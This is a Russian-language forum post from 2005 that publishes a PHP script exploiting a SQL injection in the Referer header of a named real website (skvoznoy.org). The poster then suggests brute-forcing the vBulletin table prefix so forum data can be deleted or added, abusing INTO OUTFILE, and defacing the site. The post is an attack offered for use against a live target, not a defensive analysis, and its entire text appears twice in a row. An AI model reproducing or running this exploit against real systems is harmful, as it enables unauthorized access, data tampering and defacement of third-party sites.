Zadoxlik
05.12.2005, 16:07
Мимо проходил. Сайт из серии крутых хакеров:
skvoznoy.org
____________________________________
$fp=fsockopen("skvoznoy.org",80);
fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0
Referer: http://skvoznoy.org/news/332/' union select 0,0/*
");
$get= fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp)
.fgets($fp).fgets($fp);
fclose($fp);
echo $get;
____________________________________
SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ.
Еще можно сбрутить имя таблицы новостей и задефейсить сайт
skvoznoy.org
____________________________________
$fp=fsockopen("skvoznoy.org",80);
fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0
Referer: http://skvoznoy.org/news/332/' union select 0,0/*
");
$get= fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp)
.fgets($fp).fgets($fp);
fclose($fp);
echo $get;
____________________________________
SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ.
Еще можно сбрутить имя таблицы новостей и задефейсить сайт